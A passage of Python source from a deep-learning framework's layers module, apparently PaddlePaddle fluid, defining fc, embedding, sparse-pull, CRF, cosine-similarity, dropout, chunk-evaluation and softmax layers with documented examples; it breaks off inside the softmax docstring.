@dygraph_only
def _elementwise_op_in_dygraph(x,
y,
axis=-1,
act=None,
use_mkldnn=False,
op_name=None):
op = getattr(core.ops, op_name)
out = op(x, y, 'axis', axis, 'use_mkldnn', use_mkldnn)
return dygraph_utils._append_activation_in_dygraph(
out, act, use_mkldnn=use_mkldnn)
def fc(input,
size,
num_flatten_dims=1,
param_attr=None,
bias_attr=None,
act=None,
name=None):
"""
**Fully Connected Layer**
This operator creates a fully connected layer in the network. It can take
a Tensor(or LoDTensor) or a list of Tensor(or LoDTensor) as its inputs(see
Args in detail). It creates a variable called weight for each input Tensor,
which represents a fully connected weight matrix from each input unit to
each output unit. The fully connected layer multiplies each input Tensor
with its corresponding weight to produce an output Tensor with shape :math:`[M, size]` ,
where M is batch size. If a list of Tensor is given, the results of
multiple output Tensors with shape :math:`[M, size]` will be summed up. If :attr:`bias_attr`
is not None, a bias variable will be created and added to the output.
Finally, if :attr:`act` is not None, it will be applied to the output as well.
When the input is a single Tensor(or LoDTensor):
.. math::
Out = Act({XW + b})
When the input is a list of Tensor(or LoDTensor):
.. math::
Out = Act({\sum_{i=0}^{N-1}X_iW_i + b})
In the above equation:
* :math:`N`: Number of the input. N equals to len(input) if input is list of Variable.
* :math:`X_i`: The i-th input tensor.
* :math:`W_i`: The i-th weights matrix corresponding i-th input tensor.
* :math:`b`: The bias parameter created by this layer (if needed).
* :math:`Act`: The activation function.
* :math:`Out`: The output Tensor.
.. code-block:: text
Case 1:
Given a single Tensor data_1, and num_flatten_dims = 2:
data_1.data = [[[0.1, 0.2],
[0.3, 0.4]]]
data_1.shape = (1, 2, 2) # 1 is batch_size
out = fluid.layers.fc(input=data_1, size=1, num_flatten_dims=2)
Then output is:
out.data = [[0.83234344], [0.34936576]]
out.shape = (1, 2, 1)
Case 2:
Given a list of Tensor:
data_1.data = [[[0.1, 0.2],
[0.3, 0.4]]]
data_1.shape = (1, 2, 2) # 1 is batch_size
data_2 = [[[0.1, 0.2, 0.3]]]
data_2.shape = (1, 1, 3)
out = fluid.layers.fc(input=[data_1, data_2], size=2)
Then:
out.data = [[0.18669507, 0.1893476]]
out.shape = (1, 2)
Args:
input (Variable|list of Variable): A Tensor(or LoDTensor) with shape :math:`[N_1, N_2,..., N_k]` or
a list of Tensor(or LoDTensor). The dimensions of the input Tensor is at least 2 and the data
type should be float32 or float64.
size(int): The number of output units in this layer, which also means the feature size of output
Tensor(or LoDTensor).
num_flatten_dims (int): The fc layer can accept an input Tensor with more than
two dimensions. If this happens, the multidimensional tensor will first be flattened
into a 2-D matrix. The parameter :attr:`num_flatten_dims` determines how the input
Tensor is flattened: the first :attr:`num_flatten_dims` (inclusive, index starts from 1)
dimensions will be flatten to form the first dimension of the final matrix (height of
the matrix), and the rest :math:`rank(X) - num\_flatten\_dims` dimensions are flattened to
form the second dimension of the final matrix (width of the matrix). For example, assuming that
X is a 5-dimensional Tensor with a shape [2, 3, 4, 5, 6], and :attr:`num_flatten_dims` = 3.
Then, the flattened matrix will have a shape [2 x 3 x 4, 5 x 6] = [24, 30]. Default: 1.
param_attr (ParamAttr): To specify the weight parameter property. Default: None, which means the
default weight parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr): To specify the bias parameter property. Default: None, which means the
default bias parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` .
act (str): Activation to be applied to the output of this layer, such as tanh, softmax,
sigmoid, relu. For more information, please refer to :ref:`api_guide_activations_en` . Default: None.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: Tensor or LoDTensor calculated by fc layer. The data type is same with input.
Raises:
ValueError: If dimensions of the input Tensor is less than 2.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# when input is single tensor
data = fluid.data(name="data", shape=[-1, 32], dtype="float32")
fc = fluid.layers.fc(input=data, size=1000, act="tanh")
# when input are multiple tensors
data_1 = fluid.data(name="data_1", shape=[-1, 32], dtype="float32")
data_2 = fluid.data(name="data_2", shape=[-1, 36], dtype="float32")
fc = fluid.layers.fc(input=[data_1, data_2], size=1000, act="tanh")
"""
helper = LayerHelper("fc", **locals())
check_type(input, 'input', (list, tuple, Variable), 'fc')
if isinstance(input, (list, tuple)):
for i, input_x in enumerate(input):
check_type(input_x, 'input[' + str(i) + ']', Variable, 'fc')
dtype = helper.input_dtype()
check_dtype(dtype, 'input', ['float16', 'float32', 'float64'], 'fc')
mul_results = []
for input_var, param_attr in helper.iter_inputs_and_params():
input_shape = input_var.shape
if num_flatten_dims == -1:
num_flatten_dims = len(input_shape) - 1
param_shape = [
reduce(lambda a, b: a * b, input_shape[num_flatten_dims:], 1)
] + [size]
w = helper.create_parameter(
attr=param_attr, shape=param_shape, dtype=dtype, is_bias=False)
tmp = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="mul",
inputs={"X": input_var,
"Y": w},
outputs={"Out": tmp},
attrs={"x_num_col_dims": num_flatten_dims,
"y_num_col_dims": 1})
mul_results.append(tmp)
if len(mul_results) == 1:
pre_bias = mul_results[0]
else:
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="sum",
inputs={"X": mul_results},
outputs={"Out": pre_bias},
attrs={"use_mkldnn": False})
# add bias
pre_activation = helper.append_bias_op(pre_bias, dim_start=num_flatten_dims)
# add activation
return helper.append_activation(pre_activation)
def embedding(input,
size,
is_sparse=False,
is_distributed=False,
padding_idx=None,
param_attr=None,
dtype='float32'):
"""
**WARING:** This OP will be deprecated in a future release. This OP requires the
last dimension of Tensor shape must be equal to 1. It is recommended to use
fluid. :ref:`api_fluid_embedding` .
The operator is used to lookup embeddings vector of ids provided by :attr:`input` .
It automatically constructs a 2D embedding matrix based on the
input :attr:`size` (vocab_size, emb_size) and :attr:`dtype` .
This OP requires the last dimension of Tensor shape must be equal to 1. The shape
of output Tensor is generated by replacing the last dimension of the input Tensor shape
with emb_size.
**Note:** The id in :attr:`input` must satisfy :math:`0 =< id < size[0]` ,
otherwise the program will throw an exception and exit.
.. code-block:: text
Case 1:
input is a Tensor. padding_idx = -1
input.data = [[[1], [3]], [[2], [4]], [[4], [127]]]
input.shape = [3, 2, 1]
Given size = [128, 16]
output is a Tensor:
out.shape = [3, 2, 16]
out.data = [[[0.129435295, 0.244512452, ..., 0.436322452],
[0.345421456, 0.524563927, ..., 0.144534654]],
[[0.345249859, 0.124939536, ..., 0.194353745],
[0.945345345, 0.435394634, ..., 0.435345365]],
[[0.945345345, 0.435394634, ..., 0.435345365],
[0.0, 0.0, ..., 0.0 ]]] # padding data
The input padding_idx is less than 0, it is automatically converted to padding_idx = -1 + 128 = 127
It will pad all-zero data when ids is 127.
Case 2:
input is a LoDTensor with 1-level LoD. padding_idx = 0
input.lod = [[2, 3]]
input.data = [[1], [3], [2], [4], [0]]
input.shape = [5, 1]
Given size = [128, 16]
output is a LoDTensor:
out.lod = [[2, 3]]
out.shape = [5, 16]
out.data = [[0.129435295, 0.244512452, ..., 0.436322452],
[0.345421456, 0.524563927, ..., 0.144534654],
[0.345249859, 0.124939536, ..., 0.194353745],
[0.945345345, 0.435394634, ..., 0.435345365],
[0.0, 0.0, ..., 0.0 ]] # padding data
It will pad all-zero data when ids is 0.
Args:
input(Variable): A Tensor or LoDTensor with type int64, which contains the id information.
The last dimension of Tensor shape must be equal to 1. The value of the input id should
satisfy :math:`0<= id < size[0]` .
size(tuple|list): The shape of lookup table parameter. It should have two elements which
indicates the size of the dictionary of embeddings and the size of each embedding vector respectively.
is_sparse(bool): The flag indicating whether to use sparse update. This parameter only
affects the performance of the backwards gradient update. It is recommended to set
True because sparse update is faster. But some optimizer does not support sparse update,
such as :ref:`api_fluid_optimizer_AdadeltaOptimizer` , :ref:`api_fluid_optimizer_AdamaxOptimizer` ,
:ref:`api_fluid_optimizer_DecayedAdagradOptimizer` , :ref:`api_fluid_optimizer_FtrlOptimizer` ,
:ref:`api_fluid_optimizer_LambOptimizer` and :ref:`api_fluid_optimizer_LarsMomentumOptimizer` .
In these case, is_sparse must be False. Default: False.
is_distributed(bool): Whether to store the embedding matrix in a distributed manner. Only used
in multi-machine distributed CPU training. Default: False.
padding_idx(int|long|None): padding_idx needs to be in the interval [-vocab_size, vocab_size).
If :math:`padding\_idx < 0`, the :math:`padding\_idx` will automatically be converted
to :math:`vocab\_size + padding\_idx` . It will output all-zero padding data whenever lookup
encounters :math:`padding\_idx` in id. And the padding data will not be updated while training.
If set None, it makes no effect to output. Default: None.
param_attr(ParamAttr): To specify the weight parameter property. Default: None, which means the
default weight parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` . In addition,
user-defined or pre-trained word vectors can be loaded with the :attr:`param_attr` parameter.
The local word vector needs to be transformed into numpy format, and the shape of local word
vector should be consistent with :attr:`size` . Then :ref:`api_fluid_initializer_NumpyArrayInitializer`
is used to load custom or pre-trained word vectors. See code example 2 for details.
dtype(str|core.VarDesc.VarType): It refers to the data type of output Tensor.
It must be float32 or float64. Default: float32.
Returns:
Variable: Embedding Tensor or LoDTensor mapped by input. The data type is the same as :attr:`dtype` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name='x', shape=[None, 1], dtype='int64')
# example 1
emb_1 = fluid.embedding(input=data, size=[128, 64])
# example 2: load custom or pre-trained word vectors
weight_data = np.random.random(size=(128, 100)) # word vectors with numpy format
w_param_attrs = fluid.ParamAttr(
name="emb_weight",
learning_rate=0.5,
initializer=fluid.initializer.NumpyArrayInitializer(weight_data),
trainable=True)
emb_2 = fluid.layers.embedding(input=data, size=(128, 100), param_attr=w_param_attrs, dtype='float32')
"""
helper = LayerHelper('embedding', **locals())
check_variable_and_dtype(input, 'input', ['int64'],
'fluid.layers.embedding')
check_dtype(dtype, 'dtype', ['float16', 'float32', 'float64'],
'fluid.layers.embedding')
remote_prefetch = is_sparse and (not is_distributed)
if remote_prefetch:
assert is_sparse is True and is_distributed is False
w = helper.create_parameter(
attr=helper.param_attr, shape=size, dtype=dtype, is_bias=False)
tmp = helper.create_variable_for_type_inference(dtype)
padding_idx = -1 if padding_idx is None else padding_idx if padding_idx >= 0 else (
size[0] + padding_idx)
helper.append_op(
type='lookup_table',
inputs={'Ids': input,
'W': w},
outputs={'Out': tmp},
attrs={
'is_sparse': is_sparse,
'is_distributed': is_distributed,
'remote_prefetch': remote_prefetch,
'padding_idx': padding_idx
})
return tmp
def _pull_sparse(input,
size,
table_id,
accessor_class,
name="embedding",
ctr_label_name="",
padding_id=0,
dtype='float32',
scale_sparse_grad=True):
"""
**Pull Fleet Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
Fleet lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
table_id(int): the fleet table id of this embedding.
accessor_class(str): the pslib accessor of the table, default is DownpourCtrAccessor.
ctr_label_name(str): the layer name of click.
padding_id(int): the padding id during lookup, default is 0.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
scale_sparse_grad(bool): whether to scale sparse gradient with batch size. default
is True.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
emb = fluid.layers.nn._pull_sparse(
input=data, size=11, table_id=0, accessor_class="DownpourCtrAccessor")
"""
helper = LayerHelper(name, **locals())
inputs = helper.multiple_input()
outs = [helper.create_variable_for_type_inference(dtype)]
input_names = [i.name for i in inputs]
attrs = {
'EmbeddingDim': size,
'TableId': table_id,
'AccessorClass': accessor_class,
'CtrLabelName': ctr_label_name,
'PaddingId': padding_id,
'ScaleSparseGrad': scale_sparse_grad,
'InputNames': input_names,
# this is only for compatible with embedding op
'is_distributed': True
}
# this is only for compatible with embedding op
w, _ = helper.create_or_get_global_variable(
name=name, shape=[size], dtype=dtype, is_bias=False, persistable=True)
helper.append_op(
type='pull_sparse',
inputs={'Ids': inputs,
'W': w},
outputs={'Out': outs},
attrs=attrs)
if len(outs) == 1:
return outs[0]
return outs
def _pull_sparse_v2(input,
size,
table_id,
accessor_class,
name="embedding",
ctr_label_name="",
padding_id=0,
dtype='float32',
scale_sparse_grad=True):
"""
**Pull Fleet Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
Fleet lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
table_id(int): the pslib table id of this embedding.
accessor_class(str): the fleet accessor of the table, default is DownpourCtrAccessor.
ctr_label_name(str): the layer name of click.
padding_id(int): the padding id during lookup, default is 0.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
scale_sparse_grad(bool): whether to scale sparse gradient with batch size. default
is True.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
emb = fluid.layers.nn._pull_sparse_v2(
input=data, size=11, table_id=0, accessor_class="DownpourCtrAccessor")
"""
helper = LayerHelper(name, **locals())
inputs = helper.multiple_input()
outs = [helper.create_variable_for_type_inference(dtype)]
input_names = [i.name for i in inputs]
attrs = {
'EmbeddingDim': size,
'TableId': table_id,
'AccessorClass': accessor_class,
'CtrLabelName': ctr_label_name,
'PaddingId': padding_id,
'ScaleSparseGrad': scale_sparse_grad,
'InputNames': input_names,
# this is only for compatible with embedding op
'is_distributed': True
}
# this is only for compatible with embedding op
w, _ = helper.create_or_get_global_variable(
name=name, shape=[size], dtype=dtype, is_bias=False, persistable=True)
helper.append_op(
type='pull_sparse_v2',
inputs={'Ids': inputs,
'W': w},
outputs={'Out': outs},
attrs=attrs)
if len(outs) == 1:
return outs[0]
return outs
def _pull_box_sparse(input, size, dtype='float32'):
"""
**Pull Box Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
BoxPS lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
emb = fluid.layers.pull_box_sparse(input=data, size=[11])
"""
helper = LayerHelper('pull_box_sparse', **locals())
if dtype != 'float32':
raise ValueError(
"BoxPS only support float type embedding now, and your type is: " +
dtype)
helper.input_dtype()
inputs = helper.multiple_input()
outs = [
helper.create_variable_for_type_inference(dtype)
for i in range(len(inputs))
]
helper.append_op(
type='pull_box_sparse',
inputs={'Ids': inputs},
outputs={'Out': outs},
attrs={'size': size})
if len(outs) == 1:
return outs[0]
return outs
@templatedoc()
def linear_chain_crf(input, label, param_attr=None, length=None):
"""
Linear Chain CRF.
${comment}
Args:
input(${emission_type}): ${emission_comment}
label(${label_type}): ${label_comment}
Length(${length_type}): ${length_comment}
param_attr(ParamAttr): The attribute of the learnable parameter for transition parameter.
Returns:
output(${emission_exps_type}): ${emission_exps_comment} \n
output(${transition_exps_type}): ${transition_exps_comment} \n
output(${log_likelihood_type}): ${log_likelihood_comment} \n
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
#define net structure, using LodTensor
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.program_guard(train_program, startup_program):
input_data = fluid.data(name='input_data', shape=[-1,10], dtype='float32')
label = fluid.data(name='label', shape=[-1,1], dtype='int')
emission= fluid.layers.fc(input=input_data, size=10, act="tanh")
crf_cost = fluid.layers.linear_chain_crf(
input=emission,
label=label,
param_attr=fluid.ParamAttr(
name='crfw',
learning_rate=0.01))
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
#define data, using LoDTensor
a = fluid.create_lod_tensor(np.random.rand(12,10).astype('float32'), [[3,3,4,2]], place)
b = fluid.create_lod_tensor(np.array([[1],[1],[2],[3],[1],[1],[1],[3],[1],[1],[1],[1]]),[[3,3,4,2]] , place)
feed1 = {'input_data':a,'label':b}
loss= exe.run(train_program,feed=feed1, fetch_list=[crf_cost])
print(loss)
#define net structure, using padding
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.program_guard(train_program, startup_program):
input_data2 = fluid.data(name='input_data2', shape=[-1,10,10], dtype='float32')
label2 = fluid.data(name='label2', shape=[-1,10,1], dtype='int')
label_length = fluid.data(name='length', shape=[-1,1], dtype='int')
emission2= fluid.layers.fc(input=input_data2, size=10, act="tanh", num_flatten_dims=2)
crf_cost2 = fluid.layers.linear_chain_crf(
input=emission2,
label=label2,
length=label_length,
param_attr=fluid.ParamAttr(
name='crfw',
learning_rate=0.01))
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
#define data, using padding
cc=np.random.rand(4,10,10).astype('float32')
dd=np.random.rand(4,10,1).astype('int64')
ll=np.array([[3],[3],[4],[2]])
feed2 = {'input_data2':cc,'label2':dd,'length':ll}
loss2= exe.run(train_program,feed=feed2, fetch_list=[crf_cost2])
print(loss2)
#[array([[ 7.8902354],
# [ 7.3602567],
# [ 10.004011],
# [ 5.86721 ]], dtype=float32)]
#you can use find_var to get transition parameter.
transition=np.array(fluid.global_scope().find_var('crfw').get_tensor())
print(transition)
"""
helper = LayerHelper('linear_chain_crf', **locals())
size = input.shape[2] if length else input.shape[1]
transition = helper.create_parameter(
attr=helper.param_attr,
shape=[size + 2, size],
dtype=helper.input_dtype())
alpha = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
emission_exps = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
transition_exps = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
log_likelihood = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
this_inputs = {
"Emission": [input],
"Transition": transition,
"Label": [label]
}
if length:
this_inputs['Length'] = [length]
helper.append_op(
type='linear_chain_crf',
inputs=this_inputs,
outputs={
"Alpha": [alpha],
"EmissionExps": [emission_exps],
"TransitionExps": transition_exps,
"LogLikelihood": log_likelihood
})
return log_likelihood
@templatedoc()
def crf_decoding(input, param_attr, label=None, length=None):
"""
${comment}
Args:
input(${emission_type}): ${emission_comment}
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
label(${label_type}, optional): ${label_comment}
length(${length_type}, optional): ${length_comment}
Returns:
Variable: ${viterbi_path_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
# LoDTensor-based example
num_labels = 10
feature = fluid.data(name='word_emb', shape=[-1, 784], dtype='float32', lod_level=1)
label = fluid.data(name='label', shape=[-1, 1], dtype='int64', lod_level=1)
emission = fluid.layers.fc(input=feature, size=num_labels)
crf_cost = fluid.layers.linear_chain_crf(input=emission, label=label,
param_attr=fluid.ParamAttr(name="crfw"))
crf_decode = fluid.layers.crf_decoding(input=emission,
param_attr=fluid.ParamAttr(name="crfw"))
# Common tensor example
num_labels, max_len = 10, 20
feature = fluid.data(name='word_emb_pad', shape=[-1, max_len, 784], dtype='float32')
label = fluid.data(name='label_pad', shape=[-1, max_len, 1], dtype='int64')
length = fluid.data(name='length', shape=[-1, 1], dtype='int64')
emission = fluid.layers.fc(input=feature, size=num_labels,
num_flatten_dims=2)
crf_cost = fluid.layers.linear_chain_crf(input=emission, label=label, length=length,
param_attr=fluid.ParamAttr(name="crfw_pad"))
crf_decode = fluid.layers.crf_decoding(input=emission, length=length,
param_attr=fluid.ParamAttr(name="crfw_pad"))
"""
helper = LayerHelper('crf_decoding', **locals())
transition = helper.get_parameter(param_attr.name)
viterbi_path = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
inputs = {"Emission": [input], "Transition": transition, "Label": label}
if length:
inputs['Length'] = length
helper.append_op(
type='crf_decoding',
inputs=inputs,
outputs={"ViterbiPath": [viterbi_path]})
return viterbi_path
@templatedoc()
def cos_sim(X, Y):
"""
${comment}
Args:
X (Variable): ${x_comment}.
Y (Variable): ${y_comment}.
Returns:
A Variable holding LoDTensor representing the output of cosine(X, Y).
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7], dtype='float32')
y = fluid.data(name='y', shape=[1, 7], dtype='float32')
out = fluid.layers.cos_sim(x, y)
"""
check_variable_and_dtype(X, 'X', ['float32'], 'cos_sim')
check_variable_and_dtype(Y, 'Y', ['float32'], 'cos_sim')
helper = LayerHelper('cos_sim', **locals())
out = helper.create_variable_for_type_inference(dtype=X.dtype)
xnorm = helper.create_variable_for_type_inference(dtype=X.dtype)
ynorm = helper.create_variable_for_type_inference(dtype=X.dtype)
helper.append_op(
type='cos_sim',
inputs={'X': [X],
'Y': [Y]},
outputs={'Out': [out],
'XNorm': [xnorm],
'YNorm': [ynorm]})
return out
def dropout(x,
dropout_prob,
is_test=False,
seed=None,
name=None,
dropout_implementation="downgrade_in_infer"):
"""
Computes dropout.
Drop or keep each element of `x` independently. Dropout is a regularization
technique for reducing overfitting by preventing neuron co-adaption during
training. The dropout operator randomly sets (according to the given dropout
probability) the outputs of some units to zero, while others are remain
unchanged.
dropout op can be removed from the program to make the program more efficient.
Args:
x (Variable): The input tensor variable. The data type is float16 or float32 or float64.
dropout_prob (float): Probability of setting units to zero.
is_test (bool): A flag indicating whether it is in test phrase or not.
seed (int): A Python integer used to create random seeds. If this
parameter is set to None, a random seed is used.
NOTE: If an integer seed is given, always the same output
units will be dropped. DO NOT use a fixed seed in training.Default: None.
name (str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
dropout_implementation(string): ['downgrade_in_infer'(default)|'upscale_in_train']
1. downgrade_in_infer(default), downgrade the outcome at inference
- train: out = input * mask
- inference: out = input * (1.0 - dropout_prob)
(mask is a tensor same shape with input, value is 0 or 1
ratio of 0 is dropout_prob)
2. upscale_in_train, upscale the outcome at training time
- train: out = input * mask / ( 1.0 - dropout_prob )
- inference: out = input
(mask is a tensor same shape with input, value is 0 or 1
ratio of 0 is dropout_prob)
Returns:
A Variable holding Tensor representing the dropout, has same shape and data type with `x`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="data", shape=[None, 32, 32], dtype="float32")
dropped = fluid.layers.dropout(x, dropout_prob=0.5)
"""
def get_attrs(prog, dropout_prob, is_test, seed):
if (seed is None or seed == 0) and prog.random_seed != 0:
seed = prog.random_seed
attrs = {
'dropout_prob': dropout_prob,
'is_test': is_test,
'fix_seed': seed is not None,
'seed': seed if seed is not None else 0,
'dropout_implementation': dropout_implementation,
}
return attrs
if in_dygraph_mode():
if (seed is None or
seed == 0) and default_main_program().random_seed != 0:
seed = default_main_program().random_seed
seed = seed if seed is not None else 0
_is_test = not _dygraph_tracer()._train_mode
out, mask = core.ops.dropout(x, 'dropout_prob', dropout_prob, 'is_test',
_is_test, 'fix_seed', seed is not None,
'seed', seed, 'dropout_implementation',
dropout_implementation)
return out
helper = LayerHelper('dropout', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'dropout')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
mask = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.UINT8, stop_gradient=True)
attrs = get_attrs(helper.main_program, dropout_prob, is_test, seed)
helper.append_op(
type='dropout',
inputs={'X': [x]},
outputs={'Out': [out],
'Mask': [mask]},
attrs=attrs)
return out
@templatedoc()
def chunk_eval(input,
label,
chunk_scheme,
num_chunk_types,
excluded_chunk_types=None,
seq_length=None):
"""
This operator computes the precision, recall and F1-score for chunk detection.
It is often used in sequence tagging tasks, such as Named Entity Recognition(NER).
For some basics of chunking, please refer to
`Chunking with Support Vector Machines <https://aclanthology.info/pdf/N/N01/N01-1025.pdf>`_ .
This operator supports IOB, IOE, IOBES and IO (also known as plain) tagging schemes.
Here is a NER example for the usage of these tagging schemes:
.. code-block:: python
====== ====== ====== ===== == ============ ===== ===== ===== == =========
Li Ming works at Agricultural Bank of China in Beijing.
====== ====== ====== ===== == ============ ===== ===== ===== == =========
IO I-PER I-PER O O I-ORG I-ORG I-ORG I-ORG O I-LOC
IOB B-PER I-PER O O B-ORG I-ORG I-ORG I-ORG O B-LOC
IOE I-PER E-PER O O I-ORG I-ORG I-ORG E-ORG O E-LOC
IOBES B-PER E-PER O O I-ORG I-ORG I-ORG E-ORG O S-LOC
====== ====== ====== ===== == ============ ===== ===== ===== == =========
There are three chunk types(named entity types) including PER(person), ORG(organization)
and LOC(location), and we can see that the labels have the form `<tag type>-<chunk type>` .
Since the implementation of this operator actually uses label ids rather than
label strings, to make it work, there should be a way to map label ids to
tag types and chunk types. This operator uses the following way to do mapping:
.. code-block:: python
tag_type = label % num_tag_type
chunk_type = label / num_tag_type
where `num_tag_type` is the num of tag types in the tagging scheme, `num_chunk_type`
is the num of chunk types, and `tag_type` get its value from the following table.
.. code-block:: python
Scheme Begin Inside End Single
plain 0 - - -
IOB 0 1 - -
IOE - 0 1 -
IOBES 0 1 2 3
Accordingly, in the above NER example, if the tagging scheme is IOB and chunk
types are ORG, PER and LOC, then the label ids would be as follows:
.. code-block:: python
B-ORG 0
I-ORG 1
B-PER 2
I-PER 3
B-LOC 4
I-LOC 5
O 6
With which we can map each label id to the corresponding tag type and chunk
type correctly.
Args:
input (Variable): A Tensor or LoDTensor, representing the predicted labels
from the network. When it is a Tensor, its shape would be `[N, M, 1]`,
where `N` stands for batch size, `M` for sequence length; When it is
a LoDTensor, its shape would be `[N, 1]` where `N` stands for the total
sequence lengths in this mini-batch. The data type should be int64.
label (Variable): A Tensor or LoDTensor representing the ground-truth labels.
It should have the same shape, lod and data type as ``input`` .
chunk_scheme (str): Indicate the tagging schemes used here. The value must
be IOB, IOE, IOBES or plain.
num_chunk_types (int): The number of chunk types.
excluded_chunk_types (list, optional): Indicate the chunk types shouldn't
be taken into account. It should be a list of chunk type ids(integer).
Default None.
seq_length(Variable, optional): A 1D Tensor containing the length of each
sequence when ``input`` and ``label`` are Tensor. It needn't be
provided if ``input`` and ``label`` are LoDTensor. Default None.
Returns:
tuple: A tuple including precision, recall, F1-score, chunk number detected, \
chunk number in ground-truth, chunk number correctly detected. Each \
is a Tensor with shape `[1]`. The data type of precision, recall and \
F1-score all is float32, and the others' data type all is int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
dict_size = 10000
label_dict_len = 7
sequence = fluid.data(
name='id', shape=[-1, 1], lod_level=1, dtype='int64')
embedding = fluid.embedding(
input=sequence, size=[dict_size, 512])
hidden = fluid.layers.fc(input=embedding, size=512)
label = fluid.layers.data(
name='label', shape=[1], lod_level=1, dtype='int32')
crf = fluid.layers.linear_chain_crf(
input=hidden, label=label, param_attr=fluid.ParamAttr(name="crfw"))
crf_decode = fluid.layers.crf_decoding(
input=hidden, param_attr=fluid.ParamAttr(name="crfw"))
fluid.layers.chunk_eval(
input=crf_decode,
label=label,
chunk_scheme="IOB",
num_chunk_types=(label_dict_len - 1) / 2)
"""
helper = LayerHelper("chunk_eval", **locals())
# prepare output
precision = helper.create_variable_for_type_inference(dtype="float32")
recall = helper.create_variable_for_type_inference(dtype="float32")
f1_score = helper.create_variable_for_type_inference(dtype="float32")
num_infer_chunks = helper.create_variable_for_type_inference(dtype="int64")
num_label_chunks = helper.create_variable_for_type_inference(dtype="int64")
num_correct_chunks = helper.create_variable_for_type_inference(
dtype="int64")
this_input = {"Inference": [input], "Label": [label]}
if seq_length:
this_input["SeqLength"] = [seq_length]
helper.append_op(
type="chunk_eval",
inputs=this_input,
outputs={
"Precision": [precision],
"Recall": [recall],
"F1-Score": [f1_score],
"NumInferChunks": [num_infer_chunks],
"NumLabelChunks": [num_label_chunks],
"NumCorrectChunks": [num_correct_chunks]
},
attrs={
"num_chunk_types": num_chunk_types,
"chunk_scheme": chunk_scheme,
"excluded_chunk_types": excluded_chunk_types or []
})
return (precision, recall, f1_score, num_infer_chunks, num_label_chunks,
num_correct_chunks)
def softmax(input, use_cudnn=False, name=None, axis=-1):
"""
This operator implements the softmax layer. The calculation process is as follows:
1. The dimension :attr:`axis` of the ``input`` will be permuted to the last.
2. Then the input tensor will be logically flattened to a 2-D matrix. The matrix's
second dimension(row length) is the same as the dimension :attr:`axis` of the input
tensor, and the first dimension(column length) is the product of all other
dimensions of the input tensor. For each row of the matrix, the softmax operator
squashes the K-dimensional(K is the width of the matrix, which is also the size
of the input tensor's dimension :attr:`axis`) vector of arbitrary real values to a
K-dimensional vector of real values in the range [0, 1] that add up to 1.
3. After the softmax operation is completed, the inverse operations of steps 1 and 2
are performed to restore the two-dimensional matrix to the same dimension as the ``input``.
It computes the exponential of the given dimension and the sum of exponential
values of all the other dimensions in the K-dimensional vector input.
Then the ratio of the exponential of the given dimension and the sum of
exponential values of all the other dimensions is the output of the softmax
operator.
For each row :math:`i` and each column :math:`j` in the matrix, we have:
.. math::
Out[i, j] = \\frac{\exp(X[i, j])}{\sum_j(exp(X[i, j])}
Example:
.. code-block:: text
Case 1:
Input:
X.shape = [2, 3, 4]
X.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
